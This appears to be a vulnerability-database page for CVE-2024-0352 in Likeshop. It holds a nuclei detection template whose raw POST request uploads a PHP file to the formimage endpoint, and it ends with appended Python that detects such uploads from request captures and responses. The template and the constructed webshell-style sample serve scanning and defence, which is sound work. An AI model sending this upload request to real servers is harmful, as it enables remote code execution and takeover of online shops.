Likeshop < 2.5.7.20210311 - Arbitrary File Upload

Reported by ProjectDiscovery, 26 Jun 2026 18:13:08
Type: nuclei
Source: github.com
Views: 112

Likeshop < 2.5.7.20210311 - Arbitrary File Upload: the vulnerability affects the FileServer::userFormImage function and leads to an unrestricted file upload. Impact includes confidentiality, integrity, and availability. Update to the latest version.

Related

Reporter | Title | Published | Source
GithubExploit | Exploit for Unrestricted Upload of File with Dangerous Type in Likeshop | 12 Jun 2024 09:46 | githubexploit
Circl | CVE-2024-0352 | 10 Jan 2024 00:26 | circl
CNNVD | Likeshop Code Issue Vulnerability | 9 Jan 2024 00:00 | cnnvd
CVE | CVE-2024-0352 | 9 Jan 2024 23:00 | cve
Cvelist | CVE-2024-0352 Likeshop HTTP POST Request File.php userFormImage unrestricted upload | 9 Jan 2024 23:00 | cvelist
NVD | CVE-2024-0352 | 9 Jan 2024 23:15 | nvd
Prion | Out-of-bounds | 9 Jan 2024 23:15 | prion
Positive Technologies | PT-2024-15488 | 9 Jan 2024 00:00 | ptsecurity
RedhatCVE | CVE-2024-0352 | 4 Feb 2025 23:01 | redhatcve
VulnCheck KEV | VulnCheck KEV: CVE-2024-0352 | 22 Jan 2024 00:00 | vulncheck_kev

Code
id: CVE-2024-0352

info:
  name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
  author: CookieHanHoan,babybash,samuelsamuelsamuel
  severity: critical
  description: |
    A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to an unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
  impact: |
    The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
  remediation: Update to the latest version
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0352
    - https://note.zhaoj.in/share/ciwYj7QXC4sZ
    - https://vuldb.com/?ctiid.250120
    - https://vuldb.com/?id.250120
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0352
    cwe-id: CWE-434
    epss-score: 0.70688
    epss-percentile: 0.99311
    cpe: cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: likeshop
    product: likeshop
    shodan-query: http.favicon.hash:874152924
    fofa-query: icon_hash=874152924
  tags: cve,cve2024,rce,file-upload,likeshop,intrusive,vkev,vuln
variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /api/file/formimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36

        ------WebKitFormBoundarygcflwtei
        Content-Disposition: form-data; name="file";filename="{{filename}}.php"
        Content-Type: application/x-php

        {{randstr}}
        ------WebKitFormBoundarygcflwtei--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"name\":\"{{filename}}.php\"")'
          - 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
        condition: and

    extractors:
      - type: json
        part: body
        json:
          - ".data.url"
# digest: 4b0a00483046022100cf27ce4e572056b621147fee846801edb2cd4513bcc8231b004753163f072ae5022100b4209b46edbef4996b55603f6b11986bff14f67c2c96c2119721b589cad18c06:922c64590222798bb761d5b6d8e72950
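As an added defensive example (not part of the Vulners page, the nuclei template, or the Likeshop project), the following Python checks a captured HTTP request for the request shape the template sends to the formimage endpoint, and inspects a JSON response for the success indicators the template's matchers and extractor look for. Only the endpoint path and the `code`, `name` and `base_url` fields come from the template; the response layout, the list of server-executable extensions, the `application/x-httpd-php` variant and the sample captures are assumptions constructed for this example.

```python
import json
import re
from dataclasses import dataclass
from typing import Optional

# Endpoint taken from the nuclei template above.
UPLOAD_PATH = "/api/file/formimage"
# Extensions a PHP application server would execute (assumption: a PHP stack such as Likeshop).
DANGEROUS_EXTS = (".php", ".phtml", ".phar", ".php5")

_FILENAME_RE = re.compile(r'filename="([^"\r\n]*)"', re.IGNORECASE)
_PHP_MIME_RE = re.compile(r"^Content-Type:\s*application/x-(?:httpd-)?php", re.IGNORECASE | re.MULTILINE)


@dataclass
class Finding:
    source: str    # which capture produced the finding
    reason: str    # why it was flagged
    filename: str  # filename carried in the multipart part ("" if none)


def inspect_upload_request(source: str, raw_request: str) -> Optional[Finding]:
    """Flag a POST to the formimage endpoint whose multipart part carries a server-executable file.

    Only the request line and the multipart part headers are examined, so this works on a
    proxy/WAF capture and does not depend on the application's own validation.
    """
    raw = raw_request.replace("\r\n", "\n")
    request_line = raw.split("\n", 1)[0].strip()
    fields = request_line.split(" ")
    if len(fields) < 2 or fields[0].upper() != "POST":
        return None
    if fields[1].split("?", 1)[0] != UPLOAD_PATH:
        return None
    names = [m.group(1) for m in _FILENAME_RE.finditer(raw)]
    for name in names:
        if name.lower().endswith(DANGEROUS_EXTS):
            return Finding(source, "server-executable extension in upload filename", name)
    # A part may disguise its extension but still declare a PHP MIME type, as the template does.
    _, _, body = raw.partition("\n\n")
    if _PHP_MIME_RE.search(body):
        return Finding(source, "PHP MIME type declared on a multipart part", names[0] if names else "")
    return None


def executable_upload_accepted(response_body: str) -> Optional[str]:
    """Return the stored filename when a JSON response reports success for an executable file.

    The response layout is an assumption reconstructed from the template's matchers and extractor:
    {"code": 1, "data": {"name": "<stored name>", "base_url": "uploads/user...", "url": "..."}}
    A hit means the upload was accepted, not merely attempted, which is the incident signal.
    """
    try:
        doc = json.loads(response_body)
    except ValueError:
        return None
    if not isinstance(doc, dict) or doc.get("code") != 1:
        return None
    data = doc.get("data") or {}
    name = str(data.get("name", "")) if isinstance(data, dict) else ""
    return name if name.lower().endswith(DANGEROUS_EXTS) else None


# Constructed sample captures (not real traffic). "webshell_ext" mirrors the request shape
# the template sends; the others are controls.
SAMPLE_REQUESTS = {
    "benign_png": (
        "POST /api/file/formimage HTTP/1.1\r\nHost: shop.example\r\n"
        "Content-Type: multipart/form-data; boundary=----b1\r\n\r\n"
        '------b1\r\nContent-Disposition: form-data; name="file"; filename="avatar.png"\r\n'
        "Content-Type: image/png\r\n\r\n<png bytes>\r\n------b1--\r\n"
    ),
    "webshell_ext": (
        "POST /api/file/formimage HTTP/1.1\r\nHost: shop.example\r\n"
        "Content-Type: multipart/form-data; boundary=----b2\r\n\r\n"
        '------b2\r\nContent-Disposition: form-data; name="file";filename="abc123.php"\r\n'
        "Content-Type: application/x-php\r\n\r\n<?php /* constructed marker */ ?>\r\n------b2--\r\n"
    ),
    "mime_only": (
        "POST /api/file/formimage HTTP/1.1\r\nHost: shop.example\r\n"
        "Content-Type: multipart/form-data; boundary=----b3\r\n\r\n"
        '------b3\r\nContent-Disposition: form-data; name="file"; filename="pic.jpg"\r\n'
        "Content-Type: application/x-php\r\n\r\n<?php /* constructed marker */ ?>\r\n------b3--\r\n"
    ),
    "other_endpoint": (
        "POST /api/login HTTP/1.1\r\nHost: shop.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\nuser=x.php\r\n"
    ),
}


def scan_samples(samples=SAMPLE_REQUESTS) -> dict:
    """Run the request check over every capture and return {source: reason} for the flagged ones."""
    results = {}
    for source, raw in samples.items():
        finding = inspect_upload_request(source, raw)
        if finding:
            results[source] = finding.reason
    return results


if __name__ == "__main__":
    for src, reason in scan_samples().items():
        print(f"{src}: {reason}")
    # Constructed response in the assumed layout, for the accepted-upload check.
    print(executable_upload_accepted('{"code":1,"data":{"name":"abc123.php","base_url":"uploads\\/user","url":"x"}}'))
```

The request check is the pre-incident signal (someone tried), while the response check is the post-incident one (the application stored an executable file under uploads/user); pairing a request hit with a `code: 1` response for the same transaction is what turns an alert into a confirmed compromise to triage, and the stored name from the response is the artifact to locate and remove.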


Scores (current as of 04 Feb 2026 07:00)

Vulners AI Score: 6.8 (medium risk)
CVSS 3.1: 7.3 - 9.8
CVSS 2: 7.5
CVSS 3: 7.3
EPSS: 0.70688
SSVC: